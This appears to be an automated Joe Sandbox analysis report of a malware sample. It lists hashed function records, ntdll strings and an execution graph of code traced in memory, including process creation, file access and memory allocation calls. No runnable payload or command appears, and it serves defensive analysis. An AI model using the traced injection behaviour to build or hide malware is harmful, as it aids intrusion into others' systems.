                                                                                                                        • Instruction ID: 3254ad62a46a8038a9c88bd0bc0feb299a5d0f54c59706c76e18b894e49b2c5a
                                                                                                                        • Opcode Fuzzy Hash: 6f6c4c89fdec49780596a5a3832bb9a0fad6d3ff7c6fd0be6a12c89eccbae2ea
                                                                                                                        • Instruction Fuzzy Hash: FE90022124545102D250715C4804656400DA7E0341F56C036A0815594E89598955A621
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_a30000_okawzsv.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a87d783658829e8ed7aa5d7b48a4bbd1c0a3efa163c4902c9ec9e013dcdd5ee2
                                                                                                                        • Instruction ID: 1384116898e305fbb1739aafaef20395279583da080cd62a59f45d77c9c7013e
                                                                                                                        • Opcode Fuzzy Hash: a87d783658829e8ed7aa5d7b48a4bbd1c0a3efa163c4902c9ec9e013dcdd5ee2
                                                                                                                        • Instruction Fuzzy Hash: B4900231202401429640725C5C04A8E410D87E1342B96D42AA0016554DCD1889619621
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_a30000_okawzsv.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 3174da1c5800fcac4edfcff034aacc1dd05416f3b38cafd61bd5a10760404f61
                                                                                                                        • Instruction ID: 1a98cc72acd5fc64ff175106ef57181adac41bd623a31c15cb5524e1aede476c
                                                                                                                        • Opcode Fuzzy Hash: 3174da1c5800fcac4edfcff034aacc1dd05416f3b38cafd61bd5a10760404f61
                                                                                                                        • Instruction Fuzzy Hash: 6F90023520140402D610715C5C04686004E87D0341F56D426A0425558E8A5889A1E521
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_a30000_okawzsv.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                        • Instruction ID: 21e28bf2a6fbf769e68b0db791b53455f219abaa142cff6306cdddb4e629e80e
                                                                                                                        • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_a30000_okawzsv.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ___swprintf_l
                                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                        • API String ID: 48624451-2108815105
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_a30000_okawzsv.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ___swprintf_l
                                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                        • API String ID: 48624451-2108815105

                                                                                                                        Strings
                                                                                                                        • ExecuteOptions, xrefs: 00AD46A0
                                                                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00AD46FC
                                                                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00AD4742
                                                                                                                        • Execute=1, xrefs: 00AD4713
                                                                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 00AD4787
                                                                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00AD4725
                                                                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00AD4655
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_a30000_okawzsv.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                        • API String ID: 0-484625025

                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_a30000_okawzsv.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __aulldvrm
                                                                                                                        • String ID: +$-$0$0
                                                                                                                        • API String ID: 1302938615-699404926

                                                                                                                        Strings
                                                                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00AD02E7
                                                                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00AD02BD
                                                                                                                        • RTL: Re-Waiting, xrefs: 00AD031E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_a30000_okawzsv.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                        • API String ID: 0-2474120054

                                                                                                                        Strings
                                                                                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00AD7B7F
                                                                                                                        • RTL: Re-Waiting, xrefs: 00AD7BAC
                                                                                                                        • RTL: Resource at %p, xrefs: 00AD7B8E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_a30000_okawzsv.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                        • API String ID: 0-871070163
                                                                                                                        • Opcode ID: 059353c498e2053fc51d295d1b47321dea28465a7d159b9906d6abea99fca887
                                                                                                                        • Instruction ID: 2621454ab67f3a6b372802b2e53172175178f7fabf95f3d24c0fa32c017c06dc
                                                                                                                        • Opcode Fuzzy Hash: 059353c498e2053fc51d295d1b47321dea28465a7d159b9906d6abea99fca887
                                                                                                                        • Instruction Fuzzy Hash: 3641E5353147029FCB24DF29DE41B6AB7E5EF88710F100A2EF9569B781DB71E8058BA1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AD728C
                                                                                                                        Strings
                                                                                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 00AD7294
                                                                                                                        • RTL: Re-Waiting, xrefs: 00AD72C1
                                                                                                                        • RTL: Resource at %p, xrefs: 00AD72A3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_a30000_okawzsv.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                        • API String ID: 885266447-605551621
                                                                                                                        • Opcode ID: 0d9d4978f5f5154dfb4272597049cb751cee416553e8c90cab0833fda8af0ea0
                                                                                                                        • Instruction ID: 12e8f58f96384b03f5febd663358a7e2788862bb11d14e5f8934db10893999ab
                                                                                                                        • Opcode Fuzzy Hash: 0d9d4978f5f5154dfb4272597049cb751cee416553e8c90cab0833fda8af0ea0
                                                                                                                        • Instruction Fuzzy Hash: CA410331704252ABCB24DF25CD42BAAB7E5FB94710F10061AF956AB381EB30EC1297E1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_a30000_okawzsv.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ___swprintf_l
                                                                                                                        • String ID: %%%u$]:%u
                                                                                                                        • API String ID: 48624451-3050659472
                                                                                                                        • Opcode ID: f54285c6cebfbe0a39382e9fa0e05cb653eb2a7ed9453c2f8f71f029848db4e4
                                                                                                                        • Instruction ID: c35cebbb71f47b854bc7764d3e100836d074e40874ead63142d843c1a4d35c60
                                                                                                                        • Opcode Fuzzy Hash: f54285c6cebfbe0a39382e9fa0e05cb653eb2a7ed9453c2f8f71f029848db4e4
                                                                                                                        • Instruction Fuzzy Hash: 2C318472A00219AFCB20DF29DD41BEFB7F8EB54750F844595E859E3241EB34AA548BA0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_a30000_okawzsv.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __aulldvrm
                                                                                                                        • String ID: +$-
                                                                                                                        • API String ID: 1302938615-2137968064
                                                                                                                        • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                        • Instruction ID: 75a7cbe811a1e538eda10fddcd41e9e720cd04c8cec42477c535a6451f9996be
                                                                                                                        • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                        • Instruction Fuzzy Hash: 3D919070E082169EDF24DF69CD81ABFB7B5AF46720F64451AE855E72C0EB349E40CB50
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_a30000_okawzsv.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $$@
                                                                                                                        • API String ID: 0-1194432280
                                                                                                                        • Opcode ID: 35b563f713f54dad6c2a6cb5c4acc219b9a829371a26eca6a58016126c7c47f1
                                                                                                                        • Instruction ID: 849e5cd030550ecbdcae0f95db62a255e6bb42518c6098bdf316a8698914e182
                                                                                                                        • Opcode Fuzzy Hash: 35b563f713f54dad6c2a6cb5c4acc219b9a829371a26eca6a58016126c7c47f1
                                                                                                                        • Instruction Fuzzy Hash: F1812871D002699BDB31DB54CD45BEEB7B8AF48710F1181EAA90DB7290E7309E84CFA0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:3.2%
                                                                                                                        Dynamic/Decrypted Code Coverage:2.2%
                                                                                                                        Signature Coverage:1.3%
                                                                                                                        Total number of Nodes:903
                                                                                                                        Total number of Limit Nodes:104
89796->89795 89796->89799 89804 293f4f0 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 89796->89804 89800 293fa76 89798->89800 89800->89799 89805 293f4f0 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 89800->89805 89802->89786 89803->89791 89804->89795 89805->89799 89806 29367e0 89807 29367f8 89806->89807 89811 2936852 89806->89811 89808 2939e80 LdrLoadDll 89807->89808 89807->89811 89809 293683c 89808->89809 89809->89811 89812 293a110 89809->89812 89813 293a136 89812->89813 89814 2940900 LdrLoadDll 89813->89814 89816 293a18a 89814->89816 89815 293a4fa 89815->89811 89816->89815 89859 29452a0 89816->89859 89818 293a1db 89819 293a4e2 89818->89819 89821 2947f30 3 API calls 89818->89821 89820 2946d20 2 API calls 89819->89820 89820->89815 89822 293a1f7 89821->89822 89822->89819 89823 293a2fd 89822->89823 89824 2944640 2 API calls 89822->89824 89867 2935220 89823->89867 89825 293a27e 89824->89825 89825->89823 89830 293a286 89825->89830 89828 293a2e3 89829 2946d20 2 API calls 89828->89829 89833 293a2f3 89829->89833 89830->89815 89830->89828 89831 293a2b2 89830->89831 89863 2935120 89830->89863 89836 2944f10 2 API calls 89831->89836 89832 293a35a 89838 293a4c1 89832->89838 89839 293a38a 89832->89839 89833->89811 89835 2935120 2 API calls 89835->89832 89837 293a2c2 89836->89837 89896 2942430 LdrLoadDll LdrInitializeThunk 89837->89896 89842 2946d20 2 API calls 89838->89842 89872 2944fa0 89839->89872 89843 293a4d8 89842->89843 89843->89811 89844 293a3a9 89845 2936f60 3 API calls 89844->89845 89846 293a412 89845->89846 89846->89819 89847 293a41d 89846->89847 89848 2946d20 2 API calls 89847->89848 89849 293a441 89848->89849 89881 29448a0 89849->89881 89852 29447e0 2 API calls 89853 293a47c 89852->89853 89854 293a483 89853->89854 89855 29448a0 2 API calls 89853->89855 89854->89811 89856 293a4a9 89855->89856 89887 2944450 89856->89887 89858 293a4b7 89858->89811 89860 29452bd 89859->89860 89861 2945f10 LdrLoadDll 89860->89861 89862 
29452ce CreateProcessInternalW 89861->89862 89862->89818 89864 2935144 89863->89864 89865 29447e0 2 API calls 89864->89865 89866 293515e 89865->89866 89866->89831 89868 2944640 2 API calls 89867->89868 89869 2935256 89868->89869 89870 2944fa0 2 API calls 89869->89870 89871 293526b 89870->89871 89871->89819 89871->89832 89871->89835 89873 2944fc1 89872->89873 89874 2945002 89872->89874 89876 2945f10 LdrLoadDll 89873->89876 89875 2945f10 LdrLoadDll 89874->89875 89877 2945018 89875->89877 89878 2944fde 89876->89878 89897 3342e80 LdrInitializeThunk 89877->89897 89878->89844 89879 2945033 89879->89844 89882 29448ba 89881->89882 89883 2945f10 LdrLoadDll 89882->89883 89884 29448cb 89883->89884 89898 3342d30 LdrInitializeThunk 89884->89898 89885 293a455 89885->89852 89888 2944471 89887->89888 89889 29444a6 89887->89889 89890 2945f10 LdrLoadDll 89888->89890 89891 2945f10 LdrLoadDll 89889->89891 89892 294448e 89890->89892 89893 29444bc 89891->89893 89892->89858 89899 3342fb0 LdrInitializeThunk 89893->89899 89894 29444cb 89894->89858 89896->89828 89897->89879 89898->89885 89899->89894 89900 2930720 89901 293073a 89900->89901 89902 2933f00 LdrLoadDll 89901->89902 89903 2930758 89902->89903 89904 2940900 LdrLoadDll 89903->89904 89905 293076e 89904->89905 89906 293079d 89905->89906 89907 293078c PostThreadMessageW 89905->89907 89907->89906 89908 293e920 89911 293d5b0 89908->89911 89912 293d5ba 89911->89912 89913 29341e0 LdrLoadDll 89912->89913 89914 293d62d 89913->89914 89915 293d66d 89914->89915 89916 29341e0 LdrLoadDll 89914->89916 89917 2937380 2 API calls 89915->89917 89916->89915 89918 293d751 89917->89918 89919 293d758 89918->89919 89921 293d290 89918->89921 89922 293d2b3 89921->89922 89923 2941aa0 3 API calls 89922->89923 89925 293d2c0 89923->89925 89924 293d312 89924->89918 89925->89924 89926 293d2df 89925->89926 89927 293d31e 89925->89927 89928 293d2e7 89926->89928 89929 293d304 89926->89929 89932 29341e0 LdrLoadDll 89927->89932 89930 2946d20 2 API calls 89928->89930 
89931 2946d20 2 API calls 89929->89931 89933 293d2f8 89930->89933 89931->89924 89934 293d340 89932->89934 89933->89918 89935 293c5d0 2 API calls 89934->89935 89936 293d362 89935->89936 89940 293d37a 89936->89940 89941 293d468 89936->89941 89937 293d44f 89938 2946d20 2 API calls 89937->89938 89939 293d573 89938->89939 89939->89918 89940->89937 89944 293cbf0 LdrLoadDll NtAllocateVirtualMemory RtlFreeHeap 89940->89944 89941->89937 89945 293cbf0 LdrLoadDll NtAllocateVirtualMemory RtlFreeHeap 89941->89945 89944->89940 89945->89941 89946 2944ca0 89947 2944cbe 89946->89947 89948 2944d17 89946->89948 89949 2945f10 LdrLoadDll 89947->89949 89950 2945f10 LdrLoadDll 89948->89950 89952 2944cdb 89949->89952 89951 2944d2d NtCreateFile 89950->89951 89953 2947e60 89954 2946d20 2 API calls 89953->89954 89955 2947e75 89954->89955 89956 2940460 89957 294047c 89956->89957 89968 2944c00 89957->89968 89960 29404a4 89962 2944f10 2 API calls 89960->89962 89961 29404b8 89963 2944f10 2 API calls 89961->89963 89964 29404ad 89962->89964 89965 29404c1 89963->89965 89972 2946e40 LdrLoadDll RtlAllocateHeap 89965->89972 89967 29404cc 89969 2944c1d 89968->89969 89970 2945f10 LdrLoadDll 89969->89970 89971 294049d 89970->89971 89971->89960 89971->89961 89972->89967 89973 293ff27 89974 293feca 89973->89974 89974->89973 89975 293ffca 89974->89975 89989 2944dd0 89974->89989 89977 293fff2 89981 2940009 89977->89981 89996 2944bb0 LdrLoadDll 89977->89996 89979 2940025 89983 2944f10 2 API calls 89979->89983 89980 2940010 89982 2944f10 2 API calls 89980->89982 89981->89979 89981->89980 89984 2940019 89982->89984 89986 294002e 89983->89986 89985 294005a 89986->89985 89987 2946d20 2 API calls 89986->89987 89988 294004e 89987->89988 89990 2944df1 89989->89990 89991 2944e42 89989->89991 89993 2945f10 LdrLoadDll 89990->89993 89992 2945f10 LdrLoadDll 89991->89992 89995 2944e58 NtReadFile 89992->89995 89994 2944e0e 89993->89994 89994->89977 89995->89977 89996->89981 89997 29351a5 89998 2937130 2 API calls 
89997->89998 89999 29351d0 89997->89999 89998->89999 90001 29351fc 89999->90001 90002 29370b0 89999->90002 90010 2944240 90002->90010 90004 29370f4 90005 2937115 90004->90005 90017 29443d0 90004->90017 90005->89999 90007 2937105 90008 2937121 90007->90008 90009 2944f10 2 API calls 90007->90009 90008->89999 90009->90005 90011 294425e 90010->90011 90012 294429b 90010->90012 90013 2945f10 LdrLoadDll 90011->90013 90014 2945f10 LdrLoadDll 90012->90014 90015 294427b 90013->90015 90016 29442b1 90014->90016 90015->90004 90016->90004 90018 2944423 90017->90018 90019 29443ee 90017->90019 90021 2945f10 LdrLoadDll 90018->90021 90020 2945f10 LdrLoadDll 90019->90020 90022 294440b 90020->90022 90023 2944439 90021->90023 90022->90007 90026 3344650 LdrInitializeThunk 90023->90026 90024 2944448 90024->90007 90026->90024

                                                                                                                        Control-flow Graph

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_2920000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: !$#W$%v$&,$*$1$5v$6$$9$9$$9D$<N$A$J$M$P$T$V$Vd&,$aE$b$jN$l$p$st$z$|$|G$"
                                                                                                                        • API String ID: 0-826254412
                                                                                                                        • Opcode ID: 7ca78d8483b81ab9a2a14a06c284fad788fca563a91a88537d2f398fc2cb29ea
                                                                                                                        • Instruction ID: df8a64c6aace68eb381ca6833e11e8f8ec8428f472dc415fd7ce0fb5b794a0d3
                                                                                                                        • Opcode Fuzzy Hash: 7ca78d8483b81ab9a2a14a06c284fad788fca563a91a88537d2f398fc2cb29ea
                                                                                                                        • Instruction Fuzzy Hash: 3632DFB0D05228CBEB24CF45C9947DDBBB2BF89308F2084D9D1496B294DBB91A88CF55
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • FindFirstFileW.KERNELBASE(?,00000000), ref: 0293C0F4
                                                                                                                        • FindNextFileW.KERNELBASE(00000000,00000010), ref: 0293C12F
                                                                                                                        • FindClose.KERNELBASE(00000000), ref: 0293C13A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_2920000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$File$CloseFirstNext
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3541575487-0
                                                                                                                        • Opcode ID: 7996d9c3c2ef40bdeddb89660e0f03415cd4af35b4098dd8e77b08b45b543974
                                                                                                                        • Instruction ID: 7602bb5bbc80b7f6dcb8a07f47ef3aa88200685d93301ca48df2431fcd11da5b
                                                                                                                        • Opcode Fuzzy Hash: 7996d9c3c2ef40bdeddb89660e0f03415cd4af35b4098dd8e77b08b45b543974
                                                                                                                        • Instruction Fuzzy Hash: 773194B1900608BBDB25EFA0CC85FFF777D9F94749F104459B908A6180DB70AA859FA0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • NtCreateFile.NTDLL(?,?,?,000000CA,?,?,?,?,?,?,?), ref: 02944D5E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_2920000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 823142352-0
                                                                                                                        • Opcode ID: 30d8e7833089af46cd114bbf345cf11d712c8085254f924778bf105b5637c3ed
                                                                                                                        • Instruction ID: 9b850955f477aa6812e94a121c57cc295e30c3a1f263254a595e068db68df4ec
                                                                                                                        • Opcode Fuzzy Hash: 30d8e7833089af46cd114bbf345cf11d712c8085254f924778bf105b5637c3ed
                                                                                                                        • Instruction Fuzzy Hash: A221BDB2210548ABDB14DE99DC80EEB73AEAF8C714F518208FA1DA7244D630E8518BA5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • NtReadFile.NTDLL(?,?,?,000000CA,?,?,?,?,?), ref: 02944E81
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_2920000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FileRead
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2738559852-0
                                                                                                                        • Opcode ID: c6cbe1fca1f69d251fb7b363e179ec58e056c8c8992dc877e711bdbba584212d
                                                                                                                        • Instruction ID: fd919b0571f8cbeb9b1ce00e18bc3551ec425b37dfae263a6ffb14399a69f3ff
                                                                                                                        • Opcode Fuzzy Hash: c6cbe1fca1f69d251fb7b363e179ec58e056c8c8992dc877e711bdbba584212d
                                                                                                                        • Instruction Fuzzy Hash: ED21D3B2200509AFDB14DF99DC80EEB73AEEFCC714F008609FA1DE7245D630A9118BA5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • NtAllocateVirtualMemory.NTDLL(02931888,?,02931F99,00000000,00000004,00003000,00000004,00000000,02931F99,?,02931888,02931F99,?), ref: 029450D9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_2920000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateMemoryVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2167126740-0
                                                                                                                        • Opcode ID: 8b2e28a8aa5a017478c29436a49175c680399554f77787f91accb6b170530f89
                                                                                                                        • Instruction ID: b5eec8b2cc227c92b9e833fe79fe9021e125fe24baea713e1f6da68544609919
                                                                                                                        • Opcode Fuzzy Hash: 8b2e28a8aa5a017478c29436a49175c680399554f77787f91accb6b170530f89
                                                                                                                        • Instruction Fuzzy Hash: 3A1116B6200619BFDB10DE99DC80FAB73AEEFD8714F008509FA1D97245DA34B9118BB5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_2920000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: DeleteFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4033686569-0
                                                                                                                        • Opcode ID: b201e488f55bbf64b3f94a3b9688a55daa12353c9592422b789e308b55fd2678
                                                                                                                        • Instruction ID: cfb6746fe40621b2fe95c7426f3738abc85ba7c099f26ad43f80c0a6dc6b6d81
                                                                                                                        • Opcode Fuzzy Hash: b201e488f55bbf64b3f94a3b9688a55daa12353c9592422b789e308b55fd2678
                                                                                                                        • Instruction Fuzzy Hash: 1801D1712006147FD220EA69DC40FAB736EDFC5324F408519FA1C97241DB3079158BB1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02944F44
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_2920000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Close
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3535843008-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3735730072.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 0000000B.00000002.3735730072.000000000346E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_32d0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
